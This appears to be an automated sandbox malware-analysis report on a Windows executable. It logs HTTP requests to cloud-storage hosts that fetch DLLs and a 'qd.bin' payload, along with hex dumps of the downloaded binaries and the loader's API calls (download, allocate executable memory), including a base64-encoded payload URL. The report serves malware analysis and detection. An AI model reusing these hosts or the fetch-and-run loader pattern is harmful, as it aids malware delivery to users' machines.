06 09 2b 06 01 04 01 82 37 14 02 04 0c 1e 0a 00 53 00 75 00 62 00 43 00 41 30 0b 06 03 55 1d 0f 04 04 03 02 01 86 30 0f Data Ascii: m6UKOcMQ.US&JD:S94,#2QND^3"<T{q_wO%IP:AY$^%R[&=7H_6N{6U\|2"lqG^T~c<R@wK0G0+70Uwx'Iu^&\Du0+7SubCA0U0
2024-07-25 14:04:36 UTC	8184	IN	Data Raw: 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a2 c8 b2 65 60 7b 0f 97 82 fd b0 97 ba c2 86 31 89 83 d2 34 db f4 12 22 e5 ac a6 7e 47 ce 3d 10 0e 7a ac a0 6a 7e 1d fd c7 3b 61 b6 34 46 84 a2 3d f8 a0 a7 71 6f d5 5f 68 27 36 bd 61 30 aa 51 d9 3d 79 4d f9 24 45 5a 06 92 eb 1c 34 11 c6 20 72 6f 39 bf de f0 c8 49 d5 09 8b 46 70 14 25 21 57 26 50 33 60 c3 41 17 bd dc 8a c7 01 3f 02 d4 8e dd ab 5d 47 31 0b 98 91 1c b3 0a 99 56 18 e7 f2 0b 85 8b a7 d8 06 ce 2e 69 83 bf 74 4b a2 2f d6 ab 35 69 72 1f ff d1 bb b5 91 98 96 5a 50 b4 07 04 5e f6 62 83 df b6 e3 c7 a8 90 57 c1 df 17 8c cd f3 5d 48 5f d7 55 f3 cf 9d 4f e5 2e 82 a8 5c 8e 19 49 29 2b 0d 0c 82 6c 84 8e d0 c3 82 c7 58 Data Ascii: t Corporation0"0*H0e`{14"~G=zj~;a4F=qo_h'6a0Q=yM$EZ4 ro9IFp%!W&P3`A?]G1V.itK/5irZP^bW]H_UO.\I)+lX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	43.153.232.151	443	7328	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 14:04:38 UTC	135	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 14:04:38 UTC	473	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 446840 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 14:04:38 GMT ETag: "c766ca0482dfe588576074b9ed467e38" Last-Modified: Mon, 18 Mar 2024 00:34:14 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 10292142785671919093 x-cos-request-id: NjZhMjViNzZfOGFiMjQ4MGJfMTEyMWZfNjU3NGVl x-cos-server-side-encryption: AES256
2024-07-25 14:04:38 UTC	7731	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d 4f bd 24 c9 2e d3 77 c9 2e d3 77 c9 2e d3 77 1a 5c d2 76 cb 2e d3 77 c0 56 40 77 df 2e d3 77 cf af d2 76 ca 2e d3 77 c9 2e d2 77 08 2e d3 77 cf af d7 76 c2 2e d3 77 cf af d0 76 c0 2e d3 77 cf af d6 76 44 2e d3 77 cf af d3 76 c8 2e d3 77 cf af 2c 77 c8 2e d3 77 cf af d1 76 c8 2e d3 77 52 69 63 68 c9 2e d3 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O$.w.w.w\v.wV@w.wv.w.w.wv.wv.wvD.wv.w,w.wv.wRich.w
2024-07-25 14:04:38 UTC	16368	IN	Data Raw: 10 14 5c 00 10 f0 bc 00 10 40 e0 00 10 c0 df 00 10 70 ce 00 10 60 dc 00 10 90 dc 00 10 69 6f 73 74 72 65 61 6d 00 00 00 00 69 6f 73 74 72 65 61 6d 20 73 74 72 65 61 6d 20 65 72 72 6f 72 00 00 00 60 5c 00 10 40 bd 00 10 b0 96 00 10 62 61 64 20 63 61 73 74 00 00 00 00 ac 5c 00 10 a0 b9 00 10 00 ca 03 10 00 ca 03 10 62 61 64 20 6c 6f 63 61 6c 65 20 6e 61 6d 65 00 00 00 00 00 3a 53 75 6e 3a 53 75 6e 64 61 79 3a 4d 6f 6e 3a 4d 6f 6e 64 61 79 3a 54 75 65 3a 54 75 65 73 64 61 79 3a 57 65 64 3a 57 65 64 6e 65 73 64 61 79 3a 54 68 75 3a 54 68 75 72 73 64 61 79 3a 46 72 69 3a 46 72 69 64 61 79 3a 53 61 74 3a 53 61 74 75 72 64 61 79 00 00 00 3a 4a 61 6e 3a 4a 61 6e 75 61 72 79 3a 46 65 62 3a 46 65 62 72 75 61 72 79 3a 4d 61 72 3a 4d 61 72 63 68 3a 41 70 72 3a 41 70 Data Ascii: \@p`iostreamiostream stream error`\@bad cast\bad locale name:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday:Jan:January:Feb:February:Mar:March:Apr:Ap
2024-07-25 14:04:38 UTC	8184	IN	Data Raw: 10 38 6a 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 b8 3e 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 14 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 3f 06 10 68 6a 00 10 00 00 00 00 01 00 00 00 06 00 00 00 78 6a 00 10 94 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 10 3f 06 10 05 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 68 6a 00 10 38 3f 06 10 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6a 00 10 00 00 00 00 01 00 00 00 05 00 00 00 dc 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 3f 06 10 08 6b 00 10 00 00 00 00 01 00 00 00 06 00 00 00 18 6b 00 10 34 6b 00 10 b0 6a 00 10 e8 67 Data Ascii: 8j(]\D]>@j?hjxjjjg(]\D]?@hj8?@jjjg(]\D]X?kk4kjg
2024-07-25 14:04:38 UTC	8184	IN	Data Raw: 08 e8 2f 01 00 00 83 65 fc 00 c7 06 80 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7 01 44 29 00 10 89 41 08 c7 41 04 88 29 00 10 89 45 fc c7 01 80 29 00 10 83 4d fc ff 8b c1 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 43 cb 03 10 64 a1 00 00 00 00 50 51 56 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 ff 75 08 e8 7f 00 00 00 83 65 fc 00 c7 06 64 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7 Data Ascii: /e)MMdY^UjhmdPQ23PEdM3D)AA)E)MMdYUjhCdPQV23PEduued)MMdY^UjhmdPQ23PEdM3
2024-07-25 14:04:38 UTC	8184	IN	Data Raw: 31 ce 03 10 e8 65 11 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 d8 2e 00 10 e8 42 02 00 00 8d 45 bc 8b ce 50 e8 a7 1d 00 00 8d 4d bc e8 7f 08 00 00 8b c6 e8 06 11 03 00 c2 04 00 cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 ff 75 08 8b f1 89 75 fc 89 46 04 c7 06 98 2e 00 10 e8 72 1d 00 00 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 6a 38 b8 31 ce 03 10 e8 e5 10 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 98 2e 00 10 e8 c2 01 00 00 8d 45 bc 8b ce 50 e8 27 1d 00 00 8d 4d bc e8 ff 07 00 00 8b c6 e8 86 10 03 00 c2 04 00 cc cc cc cc cc 56 8b f1 56 e8 c7 5a 00 00 59 8b c6 5e c3 cc cc c7 01 90 2a 00 10 8b c1 c2 04 00 cc cc cc cc cc c7 01 90 2a 00 10 8b c1 c3 a1 18 46 06 10 c7 05 38 49 Data Ascii: 1euEFeMh`-.BEPMUQEVuuF.r^j81uEFeMh`-.EP'MVVZY^**F8I
2024-07-25 14:04:38 UTC	8184	IN	Data Raw: 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 00 e4 ff ff 68 48 09 04 10 8d 45 f4 50 e8 bb ff 02 00 cc cc cc cc cc cc cc 56 8b f1 8b 46 10 85 c0 7e 0b ff 76 0c ff 15 cc 61 06 10 eb 0a 79 09 ff 76 0c e8 69 f3 02 00 59 ff 76 14 ff 15 cc 61 06 10 59 5e c3 cc cc cc cc 55 8b ec 6a ff 68 a4 cf 03 10 64 a1 00 00 00 00 50 56 57 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 6a 00 e8 b3 f3 ff ff 8b 47 28 85 c0 74 12 8b 30 6a 10 50 e8 7c ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 28 00 8b 47 2c 85 c0 74 12 8b 30 6a 0c 50 e8 5f ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 2c 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e c9 c3 cc cc cc cc cc 56 8b f1 8b 46 14 83 f8 0f 76 0b 40 50 ff 36 e8 1e d6 ff ff 59 59 83 66 10 00 c7 46 14 0f 00 00 00 c6 06 00 5e c3 cc cc cc cc cc cc cc cc cc Data Ascii: UMhHEPVF~vayviYvaY^UjhdPVW23PEdjG(t0jP\|YYug(G,t0jP_YYug,MdY_^VFv@P6YYfF^
2024-07-25 14:04:38 UTC	8184	IN	Data Raw: 56 57 ff 75 0c 8b f9 ff 75 08 8b 07 8b 70 24 8b ce ff 15 30 63 06 10 8b cf ff d6 5f 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 6a 30 b8 6a d1 03 10 e8 78 d1 02 00 8b d9 8b 43 1c 8b 08 85 c9 74 23 8b 53 2c 8b 32 8d 04 0e 3b c8 73 17 8d 46 ff 89 02 8b 4b 1c 8b 11 8d 42 01 89 01 0f b6 02 e9 51 01 00 00 83 7b 4c 00 75 08 83 c8 ff e9 43 01 00 00 8b cb e8 11 df ff ff 8b 4b 4c 33 d2 39 53 38 75 19 51 8d 45 d6 50 e8 a6 b6 ff ff 59 59 84 c0 74 d7 0f b6 45 d6 e9 19 01 00 00 33 c0 8d 7d d8 ab ab ab ab 89 55 e8 c7 45 ec 0f 00 00 00 88 55 d8 51 89 55 fc ff 15 98 62 06 10 83 cf ff e9 90 00 00 00 50 8d 4d d8 e8 54 f8 ff ff 83 7d ec 0f 8d 4d d8 8b 53 38 89 55 c8 76 03 8b 4d d8 8b 45 e8 03 c1 83 7d ec 0f 89 45 cc 8d 4d d8 76 03 8b 4d d8 8b 02 8b 70 18 8d 45 c4 50 Data Ascii: VWuup$0c_^]j0jxCt#S,2;sFKBQ{LuCKL39S8uQEPYYtE3}UEUQUbPMT}MS8UvME}EMvMpEP
2024-07-25 14:04:38 UTC	8184	IN	Data Raw: 0f 8d 75 c0 76 03 8b 75 c0 8a 06 3c 7f 74 32 8b 7d ac 84 c0 7e 28 0f be c8 8b c7 2b c3 3b c8 73 1d ff 75 98 2b f9 8d 4d d8 6a 01 57 e8 6e 34 00 00 80 7e 01 00 7e 01 46 8a 06 3c 7f 75 d4 8b 7d bc 83 7f 24 00 8b 45 e8 89 45 a0 7c 13 7f 06 83 7f 20 00 76 0b 8b 77 20 3b f0 76 04 2b f0 eb 02 33 f6 8b 47 14 25 c0 01 00 00 83 f8 40 0f 84 83 00 00 00 3d 00 01 00 00 74 38 56 ff 75 18 8d 45 a4 ff 75 10 ff 75 0c 50 ff 75 b8 e8 e5 20 00 00 83 c4 18 33 f6 83 7d ec 0f 8b 08 8b 50 04 8d 45 d8 89 4d 0c 89 55 10 76 03 8b 45 d8 53 50 52 51 eb 58 83 7d ec 0f 8d 45 d8 76 03 8b 45 d8 53 50 ff 75 10 8d 45 a4 ff 75 0c 50 ff 75 b8 e8 63 20 00 00 56 ff 75 18 8b 08 8b 40 04 50 89 45 10 8d 45 a4 51 50 ff 75 b8 89 4d 0c e8 86 20 00 00 83 c4 30 33 f6 eb 23 83 7d ec 0f 8d 45 d8 76 03 Data Ascii: uvu<t2}~(+;su+MjWn4~~F<u}$EE\| vw ;v+3G%@=t8VuEuuPu 3}PEMUvESPRQX}EvESPuEuPuc Vu@PEEQPuM 03#}Ev
2024-07-25 14:04:38 UTC	8184	IN	Data Raw: 33 c0 eb 07 53 e8 24 f4 ff ff 59 ff 75 f0 50 56 e8 98 fc ff ff 83 c4 0c b9 90 49 06 10 e8 bb 8b ff ff 85 db 75 4a 6a 18 89 45 f0 e8 65 93 02 00 8b f0 59 89 75 e8 c7 45 fc 07 00 00 00 85 f6 74 1a 21 5e 04 53 ff 75 08 8b ce c6 45 fc 08 c7 06 c8 32 00 10 e8 ba f8 ff ff eb 02 33 f6 ff 75 f0 83 4d fc ff 56 57 e8 42 fc ff ff 83 c4 0c eb 13 53 8b f0 e8 4b f4 ff ff 56 50 57 e8 2d fc ff ff 83 c4 10 83 7d ec 00 74 4a b9 c0 46 06 10 e8 4a 8b ff ff 8b f0 85 db 75 29 6a 08 e8 f5 92 02 00 89 45 e8 59 85 c0 74 0b 21 58 04 c7 00 1c 30 00 10 eb 02 33 c0 56 50 57 e8 f0 fb ff ff 83 c4 0c eb 11 53 e8 39 78 ff ff 56 50 57 e8 dd fb ff ff 83 c4 10 8b 75 08 53 57 ff 75 0c 56 e8 0c 5d 01 00 53 57 ff 75 0c 56 e8 b1 c2 00 00 53 8b 5d 0c 57 53 56 e8 c5 bd 00 00 09 5f 10 83 c4 30 8b Data Ascii: 3S$YuPVIuJjEeYuEt!^SuE23uMVWBSKVPW-}tJFJu)jEYt!X03VPWS9xVPWuSWuV]SWuVS]WSV_0
2024-07-25 14:04:38 UTC	8184	IN	Data Raw: 10 50 ff 36 e8 93 ff ff ff 5e c9 c2 08 00 ff 25 10 61 06 10 55 8b ec 6a ff ff 75 08 e8 0e 00 00 00 84 c0 75 06 ff 15 50 62 06 10 5d c2 04 00 55 8b ec 8b 45 08 6a 00 ff 75 0c 83 c0 04 50 8d 41 04 50 ff 15 00 61 06 10 85 c0 0f 95 c0 5d c2 08 00 cc cc cc cc 55 8b ec 8b 45 08 83 c0 04 50 ff 15 04 61 06 10 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 7d 08 00 74 07 5d ff 25 cc 61 06 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 6a 28 6a 01 83 26 00 ff 15 d0 61 06 10 59 59 85 c0 75 03 40 eb 0b 83 20 00 83 60 04 00 89 06 33 c0 5e 5d c3 cc cc cc cc cc 55 8b ec 8b 45 08 83 c0 04 50 ff 15 08 61 06 10 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 18 a1 80 32 06 10 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75 Data Ascii: P6^%aUjuuPb]UEjuPAPa]UEPa3]U}t]%a]UVuj(j&aYYu@ `3^]UEPa3]U23EES]Vu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	43.152.64.207	443	7328	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 14:04:40 UTC	132	OUT	GET /MSASN1.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: www80-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 14:04:41 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 10240 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 14:04:41 GMT ETag: "5e4ed4c5e1053d9c6cca98c0391fafbd" Last-Modified: Wed, 20 Mar 2024 05:28:11 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 11971115341371203562 x-cos-request-id: NjZhMjViNzlfOTllZjc4MGJfMjQ1YzFfNjg4Yzky x-cos-server-side-encryption: AES256
2024-07-25 14:04:41 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f5 2e 5f b2 b1 4f 31 e1 b1 4f 31 e1 b1 4f 31 e1 b8 37 a2 e1 b3 4f 31 e1 73 ce 30 e0 b3 4f 31 e1 73 ce 34 e0 bb 4f 31 e1 73 ce 35 e0 bb 4f 31 e1 73 ce 32 e0 b0 4f 31 e1 fa 37 30 e0 b4 4f 31 e1 b1 4f 30 e1 94 4f 31 e1 5e cd 38 e0 b3 4f 31 e1 5e cd ce e1 b0 4f 31 e1 5e cd 33 e0 b0 4f 31 e1 52 69 63 68 b1 4f 31 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 73 fa 65 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$._O1O1O17O1s0O1s4O1s5O1s2O170O1O0O1^8O1^O1^3O1RichO1PELse
2024-07-25 14:04:41 UTC	2508	IN	Data Raw: 00 6a 00 ff 73 38 ff 73 38 6a 00 6a 00 ff 53 0c 6a ff 50 ff 53 10 68 00 80 00 00 6a 00 ff 75 fc ff 53 08 5f 5e 33 c0 5b c9 c3 55 8b ec 83 ec 1c 53 56 8b f1 8b da 57 89 5d f4 89 75 f8 8b 46 3c 8b 44 30 78 03 c6 8b 50 20 8b 48 1c 03 d6 89 55 fc 03 ce 8b 50 24 03 d6 89 4d e4 89 55 e8 f7 c3 00 00 ff ff 74 4e 8b 40 18 33 d2 89 45 ec 8b fa 85 c0 74 48 8b 45 fc 8b 1c b8 03 de 8b f2 8a 0b 6b f6 7f 0f be c1 03 f0 43 84 c9 75 f1 8b 5d f4 89 75 f0 8b 75 f8 3b 5d f0 74 08 47 3b 7d ec 72 d3 eb 19 8b 45 e8 8b 4d e4 0f b7 04 78 8b 04 81 03 c6 eb 0a 2b 58 10 8b 14 99 03 d6 8b c2 5f 5e 5b c9 c3 64 a1 18 00 00 00 8b 40 30 8b 40 0c 8b 40 0c 8b 00 8b 00 8b 40 18 c3 55 8b ec 83 ec 0c 53 56 57 8b d9 e8 d9 ff ff ff 8b f8 c7 45 f4 57 73 32 5f ba 54 be 48 01 c7 45 f8 33 32 2e 64 Data Ascii: js8s8jjSjPShjuS_^3[USVW]uF<D0xP HUP$MUtN@3EtHEkCu]uu;]tG;}rEMx+X_^[d@0@@@USVWEWs2_THE32.d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	159.75.57.36	443	7328	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 14:04:46 UTC	123	OUT	GET /qd.bin HTTP/1.1 User-Agent: loader Host: wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com Cache-Control: no-cache
2024-07-25 14:04:46 UTC	235	IN	HTTP/1.1 451 Unavailable For Legal Reasons Content-Type: application/xml Content-Length: 477 Connection: close Date: Thu, 25 Jul 2024 14:04:46 GMT Server: tencent-cos x-cos-request-id: NjZhMjViN2VfNGYxNDdiMGJfYTNjOF8yMzMxYjdi
2024-07-25 14:04:46 UTC	477	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 75 74 66 2d 38 27 20 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 09 3c 43 6f 64 65 3e 55 6e 61 76 61 69 6c 61 62 6c 65 46 6f 72 4c 65 67 61 6c 52 65 61 73 6f 6e 73 3c 2f 43 6f 64 65 3e 0a 09 3c 4d 65 73 73 61 67 65 3e 44 75 65 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 20 69 73 20 61 72 72 65 61 72 73 2c 20 69 74 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 20 75 6e 74 69 6c 20 79 6f 75 20 72 65 63 68 61 72 67 65 2e 3c 2f 4d 65 73 73 61 67 65 3e 0a 09 3c 52 65 73 6f 75 72 63 65 3e 2f 71 64 2e 62 69 6e 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 09 3c 52 65 71 75 65 73 74 49 64 3e 4e 6a 5a 68 4d 6a 56 69 4e 32 56 66 4e 47 59 78 4e 44 64 69 4d 47 4a 66 59 54 4e 6a 4f 46 38 79 4d 7a Data Ascii: <?xml version='1.0' encoding='utf-8' ?><Error><Code>UnavailableForLegalReasons</Code><Message>Due to your account is arrears, it is unavailable until you recharge.</Message><Resource>/qd.bin</Resource><RequestId>NjZhMjViN2VfNGYxNDdiMGJfYTNjOF8yMz

Target ID:	0
Start time:	10:04:23
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002B_246.exe"
Imagebase:	0xed0000
File size:	344'224 bytes
MD5 hash:	8B5EB95F4A065EBF2719FE29321CA7FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:04:23
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:04:46
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 2040
Imagebase:	0x7e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	54

Executed Functions

Function 00ED3150 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 223
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ED2EE0: CreateDirectoryA.KERNELBASE(C:\Program Files (x86)\Everything,00000000), ref: 00ED2F05
Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2F47
Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2F56
Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2F97
Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2FA6
Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2FF6
Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED3008
Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED3058
Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED306A

Sleep.KERNELBASE(00000BB8,?,00EF7223,000000FF), ref: 00ED317C
InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 00ED319D
InternetOpenUrlA.WININET(00000000,00F0375C,00000000,00000000,80000000,00000000), ref: 00ED31DD
InternetCloseHandle.WININET(?), ref: 00ED320E
InternetCloseHandle.WININET(?), ref: 00ED3271
InternetCloseHandle.WININET(?), ref: 00ED327B
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00ED329C
InternetCloseHandle.WININET(00000000), ref: 00ED32D6
fpos.LIBCPMTD ref: 00ED3368
fpos.LIBCPMTD ref: 00ED337D
fpos.LIBCPMTD ref: 00ED33AD
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00F034E4,00000024,00000040), ref: 00ED33B5
fpos.LIBCPMTD ref: 00ED33E5
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00ED3414
InternetCloseHandle.WININET(00000000), ref: 00ED32E0

Part of subcall function 00ED7890: char_traits.LIBCPMTD ref: 00ED78BD

Part of subcall function 00ED7890: char_traits.LIBCPMTD ref: 00ED7A17

Part of subcall function 00ED7890: char_traits.LIBCPMTD ref: 00ED7AFC

Part of subcall function 00ED37F0: fpos.LIBCPMTD ref: 00ED389A

Strings

error, xrefs: 00ED331A
error, xrefs: 00ED31B1
error , xrefs: 00ED324B
error, xrefs: 00ED33C9
error, xrefs: 00ED31F1
loader, xrefs: 00ED3198

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Internettask$CloseHandlefpos$char_traits$OpenVirtual$AllocCreateDirectoryFileFreeReadSleep
String ID: error$error$error$error$error $loader
API String ID: 3533587409-2811226954
Opcode ID: 90623fcc02bbacc4faf71c614485c43fc70527361087623772710eeb55674da9
Instruction ID: 234c4a9ebf3fa28a7d78422f27dbb416533401572e9bcf8b5d112876079abebf
Opcode Fuzzy Hash: 90623fcc02bbacc4faf71c614485c43fc70527361087623772710eeb55674da9
Instruction Fuzzy Hash: 4481A3B4E40204ABCB14EBA0DC56FEE77B5EF54700F50511AF141BA2C1EFB45A4ADBA1

Function 00ED2EE0 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(C:\Program Files (x86)\Everything,00000000), ref: 00ED2F05

Part of subcall function 00ED2CB0: InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00ED2CDB
Part of subcall function 00ED2CB0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00ED2D19
Part of subcall function 00ED2CB0: task.LIBCPMTD ref: 00ED2D25
Part of subcall function 00ED2CB0: task.LIBCPMTD ref: 00ED2D70
Part of subcall function 00ED2CB0: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00ED2DAC
Part of subcall function 00ED2CB0: InternetCloseHandle.WININET(00000000), ref: 00ED2DE6
Part of subcall function 00ED2CB0: InternetCloseHandle.WININET(00000000), ref: 00ED2E02

task.LIBCPMTD ref: 00ED2F47
task.LIBCPMTD ref: 00ED2F56
task.LIBCPMTD ref: 00ED2F97
task.LIBCPMTD ref: 00ED2FA6
task.LIBCPMTD ref: 00ED2FF6
task.LIBCPMTD ref: 00ED3008
task.LIBCPMTD ref: 00ED3058
task.LIBCPMTD ref: 00ED306A
task.LIBCPMTD ref: 00ED30BA
task.LIBCPMTD ref: 00ED30CC
task.LIBCPMTD ref: 00ED311C
task.LIBCPMTD ref: 00ED312E

Strings

aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS92Y3J1bnRpbWUxNDAuZGxs, xrefs: 00ED3024
